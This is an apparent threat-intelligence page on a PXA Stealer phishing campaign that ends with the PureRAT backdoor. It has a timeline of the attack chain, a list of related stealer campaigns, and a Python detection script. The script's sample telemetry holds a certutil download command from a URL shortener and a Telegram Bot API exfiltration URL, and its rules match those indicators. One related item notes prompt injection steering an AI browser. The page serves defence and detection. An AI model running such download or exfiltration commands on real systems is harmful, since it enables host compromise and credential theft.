
PXA Stealer phishing-loader campaign

Type: Campaign
Happening score: 38
1 unique source, 1 article

Summary


A multi-stage phishing campaign progressed into credential theft, layered loaders, and a final PureRAT deployment, increasing the risk of full host compromise and follow-on control. The chain relied on DLL sideloading, in-memory execution, and Telegram Bot API exfiltration to conceal activity and move stolen data out of the environment. Clues tied the operation to PXA Stealer, pointing to a maturing operator using both custom tooling and commodity malware.

Related Happenings

REMUS infostealer browser-session and password-manager collection expansion

Malware Activity
First: 15.05.2026 17:02 Last: 15.05.2026 17:02 Sources 1

About this happening: **REMUS** expanded its **session-theft** and **password-manager** collection capabilities, increasing the malware’s ability to capture authenticated access and browser-side data....

Vidar Stealer ClickFix campaign targeting multiple sectors

Campaign
First: 08.05.2026 14:00 Last: 08.05.2026 14:00 Sources 1

About this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

Vidar Stealer 2.0 fake game-cheat distribution

Malware Activity
First: 18.03.2026 13:15 Last: 18.03.2026 13:15 Sources 1

About this happening: The **Vidar Stealer 2.0** malware is being spread through **fake game-cheat repositories** and **Reddit lures**, putting players seeking cheats for major online games at risk of *...

Perplexity Comet prompt-injection research shows agentic browsers can be trained into phishing traps

Technical Analysis
First: 11.03.2026 18:38 Last: 11.03.2026 18:38 Sources 1

About this happening: **Perplexity's Comet AI browser** is the focus of a **technical analysis** thread showing how **prompt injection** and **malicious URLs** can steer an agentic browser into **data...

Timeline

  1. 09.10.2025 17:01 2 articles · 7mo ago

    PXA Stealer phishing campaign culminates in PureRAT backdoor

    Initial Disclosure

    Huntress Labs describes a multi-stage phishing campaign against the affected organization that began with a ZIP archive disguised as a copyright infringement notice, used DLL sideloading and in-memory Python loaders, harvested Chrome and Firefox credentials, cookies, credit cards, and autofill data, and exfiltrated stolen ZIP archives through the Telegram Bot API. The chain then pivoted to .NET process hollowing via RegAsm.exe, patched AMSI and ETW to reduce visibility, used certutil.exe, is[.]gd, and 0x0[.]st to fetch later stages, created a Windows Update Service run key for persistence, and ultimately loaded Mhgljosy.dll and the commercially available PureRAT backdoor with TLS pinning for encrypted command-and-control.
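The chain above is built from a handful of observable, host-side steps: certutil.exe fetching stages from is[.]gd and 0x0[.]st, RegAsm.exe being hollowed after the Python loader stage, a Run key named "Windows Update Service", and exfiltration to the Telegram Bot API. The following detection sketch is an added example, not Huntress Labs' or this page's code. It scans a list of simplified, constructed telemetry records (the field names `image`, `parent_image`, `cmdline`, `target_object`, `dest_host` and `url` are assumptions, not a real EDR schema) and reports which records match one of those steps; the defanged domains from the write-up are re-fanged only for string matching.

```python
"""Detection sketch for the PXA Stealer -> PureRAT chain described above.
Added example; event records are constructed stand-ins for process-creation,
registry and network telemetry (field names are assumptions)."""
import re
from typing import Dict, List, Tuple

# Indicators named in the report (defanged domains re-fanged for matching).
STAGING_HOSTS = {"is.gd", "0x0.st"}
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
# Assumption: a .NET host like RegAsm.exe spawned by one of these is suspect.
SCRIPT_PARENTS = ("\\python.exe", "\\pythonw.exe", "\\wscript.exe",
                  "\\cscript.exe", "\\powershell.exe", "\\cmd.exe")


def _host(url: str) -> str:
    """Extract the lower-cased host part of an http(s) URL."""
    m = re.match(r"https?://([^/:]+)", url, re.I)
    return m.group(1).lower() if m else ""


def check_process(ev: Dict[str, str]) -> List[str]:
    """certutil.exe as a downloader, and RegAsm.exe launched by a script host."""
    hits: List[str] = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("cmdline", "")
    if image.endswith("\\certutil.exe"):
        urls = re.findall(r"https?://\S+", cmd, re.I)
        if any(_host(u) in STAGING_HOSTS for u in urls):
            hits.append("certutil.exe fetching from is.gd / 0x0.st staging host")
        elif urls or "-urlcache" in cmd.lower():
            hits.append("certutil.exe used as a downloader")
    if image.endswith("\\regasm.exe") and parent.endswith(SCRIPT_PARENTS):
        hits.append("RegAsm.exe spawned by a script host (process-hollowing candidate)")
    return hits


def check_registry(ev: Dict[str, str]) -> List[str]:
    """Run-key persistence using the value name seen in the report."""
    hits: List[str] = []
    target = ev.get("target_object", "")
    if RUN_KEY.search(target):
        value_name = target.rsplit("\\", 1)[-1]
        if value_name.lower() == "windows update service":
            hits.append("Run key named 'Windows Update Service' created")
        elif ev.get("image", "").lower().endswith("\\regasm.exe"):
            hits.append("Run key written by RegAsm.exe")
    return hits


def check_network(ev: Dict[str, str]) -> List[str]:
    """Telegram Bot API traffic, and RegAsm.exe (a build tool) talking outbound."""
    hits: List[str] = []
    dest = ev.get("dest_host", "").lower()
    url = ev.get("url", "")
    if dest == "api.telegram.org" or TELEGRAM_BOT_API.search(url):
        hits.append("connection to Telegram Bot API (exfiltration channel)")
    if ev.get("image", "").lower().endswith("\\regasm.exe"):
        hits.append("RegAsm.exe making an outbound connection")
    return hits


CHECKS = {"process": check_process, "registry": check_registry, "network": check_network}


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every matched indicator, in event order."""
    findings: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for reason in CHECKS.get(ev.get("type", ""), lambda _: [])(ev):
            findings.append((idx, reason))
    return findings


# Constructed sample telemetry mirroring the chain; paths and URLs are made up.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": "C:\\Windows\\System32\\certutil.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f https://is.gd/EXAMPLE stage2.bin"},
    {"type": "process", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "parent_image": "C:\\Users\\user\\AppData\\Local\\Programs\\Python\\python.exe",
     "cmdline": "RegAsm.exe"},
    {"type": "registry", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "target_object": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Update Service"},
    {"type": "network", "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "dest_host": "api.telegram.org",
     "url": "https://api.telegram.org/botEXAMPLE_TOKEN/sendDocument"},
    {"type": "process", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "chrome.exe"},
    {"type": "network", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "dest_host": "example.com", "url": "https://example.com/"},
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Each check is deliberately narrow and keyed to behaviour rather than file hashes, so it still fires if the loaders are rebuilt: a build-time utility such as RegAsm.exe should not be spawned by a Python interpreter, write Run keys, or open network connections, and certutil.exe pulling from URL shorteners or paste sites is rarely legitimate in a user session. The benign Chrome records in the sample produce no findings, which is the check a practitioner should run before deploying any of these rules.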
